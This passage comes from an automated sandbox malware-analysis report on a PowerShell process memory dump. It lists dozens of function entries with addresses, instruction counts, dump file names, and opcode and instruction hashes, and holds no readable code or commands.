                                          • Opcode ID: 8fab8aeb34a14b3f4b3ae31f7b85516703944706fefbcb36c12700b17e20d152
                                          • Instruction ID: 4f641939c8ebd11ff30bdcad4d5e6b4606df7019386f853d21d58161ff0b6436
                                          • Opcode Fuzzy Hash: 8fab8aeb34a14b3f4b3ae31f7b85516703944706fefbcb36c12700b17e20d152
                                          • Instruction Fuzzy Hash: 40816134E1020CAFDB04EFA5D894A9EBBB3EF88304F508469D815A7754DB34AD46CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0627766E Relevance: .2, Instructions: 200COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4cbcffcfae737503a40bc49eb83d4f07ffbf9cb684a2e979f8cb55b4aad7bf7e
                                          • Instruction ID: 3bfa21a84f8f7924c8a27168048c44581786d2515d128a77c69f55157c0d5b54
                                          • Opcode Fuzzy Hash: 4cbcffcfae737503a40bc49eb83d4f07ffbf9cb684a2e979f8cb55b4aad7bf7e
                                          • Instruction Fuzzy Hash: 39812A35A11219CFEB55DF69D854FAEB7B2BF88300F1481AAD909EB2A0DB309D41DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626F8BE Relevance: .2, Instructions: 192COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bf85cabe0922c8ff196d802ed254511f689f759c37c3a5c1dfcaa281d6ef73d
                                          • Instruction ID: 591dd3de76b56a797e4dc4f9668b14b48100499e5a5826146f0078cfe0b58d30
                                          • Opcode Fuzzy Hash: 6bf85cabe0922c8ff196d802ed254511f689f759c37c3a5c1dfcaa281d6ef73d
                                          • Instruction Fuzzy Hash: 99718D34A2120ADFCF91CFA5D684A9DBBB2AF84714F14C915EC494B664C770ED86CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06260BD8 Relevance: .2, Instructions: 178COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f13309cc696f35561e80283589853da4ced88c737e1bd0276b8661cc626bd60
                                          • Instruction ID: ba9f24c334e345edd9d155f66ecdbc7b48aa481fcb9afadf7cfd56950651956c
                                          • Opcode Fuzzy Hash: 5f13309cc696f35561e80283589853da4ced88c737e1bd0276b8661cc626bd60
                                          • Instruction Fuzzy Hash: FB51B130B305169BDB549BB69A5557F7AEBEB84641B104229FC03E73D0EF70AC4297E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06274CF8 Relevance: .2, Instructions: 174COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b0e6aa917479f181219762b91c78237eeba0e48739c1757a70f2a79b0740010
                                          • Instruction ID: ab767278fdc7f95011f27872bdbf115ab5d36b538aa4682c8149e61030d91f60
                                          • Opcode Fuzzy Hash: 1b0e6aa917479f181219762b91c78237eeba0e48739c1757a70f2a79b0740010
                                          • Instruction Fuzzy Hash: F2517175B0011C5FDF059BA4D860BAEBAB7EF8C344F208169E905B7798CF355D058B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06274D08 Relevance: .2, Instructions: 168COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 605b309348de948bac23cab4f1be8d4f041bf24ed6a8224d18d0eefc309dcb67
                                          • Instruction ID: 5dbb3d9beb934881c4d26333807787e3280af244c0319bb8c8da613ca726fa30
                                          • Opcode Fuzzy Hash: 605b309348de948bac23cab4f1be8d4f041bf24ed6a8224d18d0eefc309dcb67
                                          • Instruction Fuzzy Hash: FF517234B0011C5FDF059BA4D860BAEB6B7EF8C304F208069EA05B7798CF355D059B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626F3D9 Relevance: .1, Instructions: 146COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ecc51e02b78005f3631ce7da523ac9d2dfcd16e8a66201d84c5c4b1ba9ba6361
                                          • Instruction ID: eaeba79a27162fc66f0d35d24ce6a39821bc61e900e721df5bb05999693bf5d7
                                          • Opcode Fuzzy Hash: ecc51e02b78005f3631ce7da523ac9d2dfcd16e8a66201d84c5c4b1ba9ba6361
                                          • Instruction Fuzzy Hash: E5517D74A102099FCB14CFA5D594B9EBBB2AF88304F10C129E805AB755DB71AD86CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626B870 Relevance: .1, Instructions: 140COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c9d35728e3deefbfc3dd095d006c77a272ec876c598f3e76c5d1f2de2cfa6e08
                                          • Instruction ID: 70e8bcdc2ba5db1ca736128f05b27496ded232fc07fec6892c576f2be6c2b2da
                                          • Opcode Fuzzy Hash: c9d35728e3deefbfc3dd095d006c77a272ec876c598f3e76c5d1f2de2cfa6e08
                                          • Instruction Fuzzy Hash: FE412331F1024A9FCF418FB98850ABF7BB6AF88219F14806AE804D7340DB35CD16CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06264501 Relevance: .1, Instructions: 138COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 694bdfe13dd43a3d04b7fa3b5bf0a68be5dcb49af40377f497ad749685869fb9
                                          • Instruction ID: a19293ece8bfb1a43ef4b131aa81b8d0d38d86d6ddc170b03e696dabb07f4e21
                                          • Opcode Fuzzy Hash: 694bdfe13dd43a3d04b7fa3b5bf0a68be5dcb49af40377f497ad749685869fb9
                                          • Instruction Fuzzy Hash: 97512F34A10209CFDB58EFA5D558BADBBF1FF44309F148429E84297290DB75AD86CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0627D8F7 Relevance: .1, Instructions: 133COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b17ad2ef8baa53d4bcae0f336668b9f78142bd26b87e4289dd6977217dc257a4
                                          • Instruction ID: cde5bcbab4fd673c3424e69fc6b71e7024af5b0df00a5d10fba89d92cde7edab
                                          • Opcode Fuzzy Hash: b17ad2ef8baa53d4bcae0f336668b9f78142bd26b87e4289dd6977217dc257a4
                                          • Instruction Fuzzy Hash: 62417E39700208EFDB16AB70D4A5A7E3AB3EFC8344F504558EE069B394DF35AD468B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626DDC0 Relevance: .1, Instructions: 125COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94163e1186e40e4740b9875a654ae0ac1acdc037fac25d262e3e8360f729c63d
                                          • Instruction ID: 23b294aa4c95c3592bc3ac04c175b4fe46fdb62ed1ac427da750a7a402315d52
                                          • Opcode Fuzzy Hash: 94163e1186e40e4740b9875a654ae0ac1acdc037fac25d262e3e8360f729c63d
                                          • Instruction Fuzzy Hash: 2E311535B102189FDB65AA3994143BE76E6DF81344F0488BAE809DB384DF79DD81CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062602AF Relevance: .1, Instructions: 121COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 863da2ebe4bfec45c993066f151dba8efa37a3e877a1055ef7951f60ffb441a5
                                          • Instruction ID: 30f712f32d39a40ccfaae8306d4975d9cd414fc633149e9c075a0f76425fb3fb
                                          • Opcode Fuzzy Hash: 863da2ebe4bfec45c993066f151dba8efa37a3e877a1055ef7951f60ffb441a5
                                          • Instruction Fuzzy Hash: 36417575B001099FDB44DFA9D994BAEB7F2EFC5314F1080A9E809AB390DB34AD42CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06263D18 Relevance: .1, Instructions: 121COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f9170efd6a3cc49f19fabf6a4edef5de12eab1633741dc1db7662640d6b502f6
                                          • Instruction ID: b7acfaee672243df0c2337c871aed27412480472f47a55b2ef871a3e2e5c02f1
                                          • Opcode Fuzzy Hash: f9170efd6a3cc49f19fabf6a4edef5de12eab1633741dc1db7662640d6b502f6
                                          • Instruction Fuzzy Hash: 06418175E202159FDB54CF6AD5402EEBBF1AF88364F049076EC05E7250E7798D81CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06269301 Relevance: .1, Instructions: 114COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42b9ffd24f8ecc5d3ba1f4a325cc96e1e1f788f84d410e4b7dd56f23dd4a9985
                                          • Instruction ID: 32555a7beae75d624a0d69595358e91ed3fcc34ec4e6356ad2dacfa627d0f9dc
                                          • Opcode Fuzzy Hash: 42b9ffd24f8ecc5d3ba1f4a325cc96e1e1f788f84d410e4b7dd56f23dd4a9985
                                          • Instruction Fuzzy Hash: 1941F331E1021ADFCB05CFB5D894A9DBBB2FF85304F14855AE805AB291DF70AC86CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06265B60 Relevance: .1, Instructions: 114COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed900bc7f041e0bb647bf551432a075041265f2bed2566e845b8995ea99f8984
                                          • Instruction ID: 53703f5a339521365c9037ac191da462c120643f7993a69fbc605a38feedd91d
                                          • Opcode Fuzzy Hash: ed900bc7f041e0bb647bf551432a075041265f2bed2566e845b8995ea99f8984
                                          • Instruction Fuzzy Hash: 46414F34A0060CAFDB04EFA5D8A0B9DB7B7FB88304F1085A9DC16A7795DB35A945CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06260AE2 Relevance: .1, Instructions: 105COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 007a031e1e5b421fc1702dce1d2fc83828388f596b78b1421a05986485ac0839
                                          • Instruction ID: 7b6b3eff56540e3ad1defb514fc9062e599d4fe7586c0dfcd3a9af6547c01713
                                          • Opcode Fuzzy Hash: 007a031e1e5b421fc1702dce1d2fc83828388f596b78b1421a05986485ac0839
                                          • Instruction Fuzzy Hash: 1331F13AB202165BD754A626D61177FB2DADFC0398F08C529EC0A87344EF78DD8693E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06275A08 Relevance: .1, Instructions: 103COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc5517c4443a0decd545ec4aa46788d96da0a1fb3bb8cb8fd923607534ae3f4b
                                          • Instruction ID: 9564deb1df7813fec823138b10ec7cd10ddf1ca21774c1d41c0c68355ff2bdca
                                          • Opcode Fuzzy Hash: cc5517c4443a0decd545ec4aa46788d96da0a1fb3bb8cb8fd923607534ae3f4b
                                          • Instruction Fuzzy Hash: 87419D70E10209ABEB15DBB0D491AAEB7B3EF84304F608468D905BB344DF38AD45CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626BFB8 Relevance: .1, Instructions: 97COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a50bf743ae9c95e294851bd76b43081dba5fbfeac08593213754527c4e5c2e57
                                          • Instruction ID: 4724cfecebe086ea374cf39caa263119ef110b63c5a801389719e4627e86225b
                                          • Opcode Fuzzy Hash: a50bf743ae9c95e294851bd76b43081dba5fbfeac08593213754527c4e5c2e57
                                          • Instruction Fuzzy Hash: 5C31A435700609ABD701AF79D84556EB7A3EFC5320B108229E9299B3D0EF35DD42CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062602C0 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d586f94a16a629da5195df855433d6b5174ebbb37ac72cf7d5d8e581ef73ab78
                                          • Instruction ID: 4ff30fe91209aa65a45c26d5a4e000e990bb0b46ce580304b265ff96a18025b1
                                          • Opcode Fuzzy Hash: d586f94a16a629da5195df855433d6b5174ebbb37ac72cf7d5d8e581ef73ab78
                                          • Instruction Fuzzy Hash: 1B314075B101099FCB84DF69C994AAEB7F6EFC8315F118069E809EB391DB34AD41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626BF5F Relevance: .1, Instructions: 91COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c64a0fd0ff0697d409275ffebbdf6eb20a04f2288ff4573003208327f61469e
                                          • Instruction ID: 7b1f16246eb8b2a206e7a7653b11c7bc68e6826b8ae5d04f211a89ca15391dc2
                                          • Opcode Fuzzy Hash: 2c64a0fd0ff0697d409275ffebbdf6eb20a04f2288ff4573003208327f61469e
                                          • Instruction Fuzzy Hash: 41313A32609385AFD7029B3898545DE7FB2EF83220B1546A7D454CF2A2DB349915C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062603DF Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e4f4a9378b2f2d2bf9c7ade96e5c2a18fdde42f46bf0f502098c5021c244a0c5
                                          • Instruction ID: 5fd2fc7c2298679ed4ac3b76d808a33deb6317e57db0ce83d6bfbd1a290bd85e
                                          • Opcode Fuzzy Hash: e4f4a9378b2f2d2bf9c7ade96e5c2a18fdde42f46bf0f502098c5021c244a0c5
                                          • Instruction Fuzzy Hash: BC318E35B002059FCB44DB69D894AAFB7B6EF84314F104479E919AB354EF34EC02CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06268F48 Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 59af59e341f18a02d293cf0377dc2ebefe1b9285a08c254ed668b224403459b2
                                          • Instruction ID: 574df57f6a2be202753b187e178bd83c800436b16fc0ffc22a6a59b39889b978
                                          • Opcode Fuzzy Hash: 59af59e341f18a02d293cf0377dc2ebefe1b9285a08c254ed668b224403459b2
                                          • Instruction Fuzzy Hash: 83319E34E101099FDB54DFA9C848AAD7BB2EF85310F408429E905AB254CB759885CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06276F90 Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4acb85553e60b8184e6abaa0774f4307d6071e7d68a29fc4573ac04329c8654
                                          • Instruction ID: 4ba4530a058d08896dabbedb10b968760b7bc0635d6bf0f658421d8b3686bd57
                                          • Opcode Fuzzy Hash: d4acb85553e60b8184e6abaa0774f4307d6071e7d68a29fc4573ac04329c8654
                                          • Instruction Fuzzy Hash: A8314A39B002099FD744DFA9D891AAEB3E6EF88314F144139DA05D7359EF31AD01CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06260BC8 Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b29be2c6a5c52d85837c6e4c5b5e162fef8c98ac780c3f36529ab027289038f6
                                          • Instruction ID: 91f28f249d9f833dbd0ed1e3e40d743b5cf08e795e2f7b81b8b4ee0a25d2b035
                                          • Opcode Fuzzy Hash: b29be2c6a5c52d85837c6e4c5b5e162fef8c98ac780c3f36529ab027289038f6
                                          • Instruction Fuzzy Hash: C221D83AF305169BCB6457B6A51527E7AA6DF84295B04822AFC07D3380EF748D46D3D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626B860 Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 55018089bda792b2f8cfbb3a202422180291c33e7cdc21976129c905f5dd19a8
                                          • Instruction ID: c5e9eb7b92bddca7af863d6e18325d5f286f1323f3dcbcb7e921e0ff71ebf453
                                          • Opcode Fuzzy Hash: 55018089bda792b2f8cfbb3a202422180291c33e7cdc21976129c905f5dd19a8
                                          • Instruction Fuzzy Hash: F931DE71D1024AAFDF01CFA99840AFFBFBABF88205F04806AF800E2251D7348961DF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626A7A5 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3759887f90ea144271c2d9e934fd9e441435d9b40f8604071dba9a6328de865d
                                          • Instruction ID: 045f06ce9ac2244194254094e8e08556895e51cf85cf7bc0297e26bc20072bc8
                                          • Opcode Fuzzy Hash: 3759887f90ea144271c2d9e934fd9e441435d9b40f8604071dba9a6328de865d
                                          • Instruction Fuzzy Hash: 79310C35B112049FDB049BB5C459AADBBB2AF88304F148429E912B73A0CF759C4ACFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06265AC8 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5320d92236e8c55914ba1eccd77c8b9f9340944d38ad0feb7797313d1bbada3e
                                          • Instruction ID: c3960ebe1715408a22cdf370b31cc6feded80deb89edcc8f6a759ccd276f6deb
                                          • Opcode Fuzzy Hash: 5320d92236e8c55914ba1eccd77c8b9f9340944d38ad0feb7797313d1bbada3e
                                          • Instruction Fuzzy Hash: 8F317F356002059FC714DB64D884FAAB7E6FF88314F148969E95A9B751DB70BC0A8BD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062650A8 Relevance: .1, Instructions: 84COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bbd465cc335e7a38e9d851d64ba5e70877b9737459373d42492349e5d1f463b3
                                          • Instruction ID: cd775cdf58153aa401c6ee6f77468d9ce069bfc087424145e06ff99728d620f6
                                          • Opcode Fuzzy Hash: bbd465cc335e7a38e9d851d64ba5e70877b9737459373d42492349e5d1f463b3
                                          • Instruction Fuzzy Hash: 9631CE30B502059FD7589F35C858BAEBBF2AF89704F1480A9E806E7390DF349C85CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06263C50 Relevance: .1, Instructions: 84COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9aa85438a6ddc077d092785f2034a2012729d651c14e3c786876316b9c9a86e4
                                          • Instruction ID: 55b236c64e7d632967a997332cf50c0cde7a7d9cf722c30962e709b9ab514c03
                                          • Opcode Fuzzy Hash: 9aa85438a6ddc077d092785f2034a2012729d651c14e3c786876316b9c9a86e4
                                          • Instruction Fuzzy Hash: 8821653A3102206FD704DB7AE88495ABBA6FFC96B57144176FA06CB361DB32EC54C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062674A0 Relevance: .1, Instructions: 78COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d19b52f7f8fcf50fef91b5f709262548c8f9c70005459ed2c9986991321eaf3
                                          • Instruction ID: b7b9b2b4b247c94918678e9631231f71c1c2f4907a6f67ffadcaebe0a01f2094
                                          • Opcode Fuzzy Hash: 3d19b52f7f8fcf50fef91b5f709262548c8f9c70005459ed2c9986991321eaf3
                                          • Instruction Fuzzy Hash: 4A21AC75B1020A9FCB05DF69D881ABEBBB6FB88254F108129E905D7350DB35EC52CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062650B8 Relevance: .1, Instructions: 78COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6221b71f3a434f24274df0896d0c5fc6905fc8eef93f662888b90afea8e0fdb9
                                          • Instruction ID: a01cc0f7351b761d8b3ced54e840716024155bdc8b24420a4e670ab2268b927a
                                          • Opcode Fuzzy Hash: 6221b71f3a434f24274df0896d0c5fc6905fc8eef93f662888b90afea8e0fdb9
                                          • Instruction Fuzzy Hash: 50316D30B502059FD7599F75C858BAEBBF2AF88714F1440A9E806A7390DF749C85CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062658DF Relevance: .1, Instructions: 78COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d676abb6676c11bdf07849ac5b29481357f6c1406768d090c2e55c83a05aced0
                                          • Instruction ID: 9861f4a3fd86eabee4a0067c3cbc9c60cf1fbecab87c5503a54d95db1f94d7f9
                                          • Opcode Fuzzy Hash: d676abb6676c11bdf07849ac5b29481357f6c1406768d090c2e55c83a05aced0
                                          • Instruction Fuzzy Hash: 23218171A002099FCB10DFA9D841ADEFBF2FF88314F004969E519A7710D731A956CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626A48B Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          Memory Dump Source
